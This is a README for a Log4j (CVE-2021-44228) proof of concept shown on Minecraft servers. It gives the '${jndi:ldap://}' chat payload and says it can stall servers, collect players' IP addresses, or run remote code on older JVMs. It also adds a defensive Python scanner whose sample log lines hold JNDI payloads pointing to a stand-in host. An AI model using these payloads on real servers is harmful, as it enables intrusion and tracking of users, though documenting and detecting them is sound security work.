# Proof of Concept for Log4j (CVE-2021-44228)

## Disclaimer

This project is only for educational purposes.


## Introduction

This is a proof of concept of the Log4j RCE, adapted from HyCraftHD.

Here are some links for the CVE-2021-44228:

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is **2.15.0**, which fixes the exploit.

## Demonstration with minecraft (which uses log4j2)

- Details for the impact on minecraft are listed here:
- Article from minecraft is here:
- Fixed minecraft forge versions:
- Detailed article from minecraft forge:
- Fixed minecraft fabric versions:
- Fixed minecraft paper versions:
- Fixed minecraft spigot versions:
- Fixed minecraft sponge versions:

### Lag or sending serialized data 

- Paste ``${jndi:ldap://}`` in the chat. If there is an open socket on port ``389``, log4j tries to connect and blocks further communication until a timeout occurs.
- When using this proof of concept exploit, the console log will show ``THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!``, which is a serialized string object from the LDAP server.


- Additionally, the malicious LDAP server receives the IP address of every machine where the message is logged. This means that the IP addresses of players on a server can be collected with this exploit.
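
Because every machine that logs the message contacts the host named in it, a server's logs can be scanned to find where such a lookup string was logged and which remote hosts to look for in egress records. The following is an added example, not part of the original proof of concept; the function names, sample log lines and the host `ldap.example.invalid` are constructed, and it matches only the literal `${jndi:scheme://...}` form shown above.

```python
import re
from collections import defaultdict

# ${jndi:<scheme>://<host>[:<port>][/<path>]}; matched case-insensitively to be conservative.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]*)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636}  # well-known ports; other schemes give None


def find_jndi_lookups(line):
    """Return (scheme, host, port) for every JNDI lookup string in one log line."""
    hits = []
    for m in JNDI_RE.finditer(line):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme)
        hits.append((scheme, m.group("host").lower(), port))
    return hits


def scan(lines):
    """Map each lookup target to the 1-based line numbers where it was logged."""
    targets = defaultdict(list)
    for lineno, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            targets[hit].append(lineno)
    return dict(targets)


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <alice> hello everyone",
    "[12:00:07] [Server thread/INFO]: <mallory> ${jndi:ldap://ldap.example.invalid/a}",
    "[12:00:09] [Server thread/INFO]: <mallory> ${jndi:ldap://ldap.example.invalid:1389/b}",
    "[12:00:15] [Server thread/INFO]: <bob> what does ${jndi} even mean?",
    "[12:00:21] [Server thread/INFO]: <mallory> ${JNDI:LDAP://LDAP.EXAMPLE.INVALID/c}",
]

if __name__ == "__main__":
    for (scheme, host, port), linenos in scan(SAMPLE_LOG).items():
        print(f"{scheme}://{host}:{port} logged on lines {linenos}")
```

Each reported target is a host and port to search for in firewall or DNS logs of the machines that wrote those lines.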

### RCE

- Paste ``${jndi:ldap://}`` in the chat. If the JVM was started with ``-Dcom.sun.jndi.ldap.object.trustURLCodebase=true``, the remote code execution will happen.


- Fortunately, modern JDKs disable remote class loading by default.
- Old versions may still allow this!!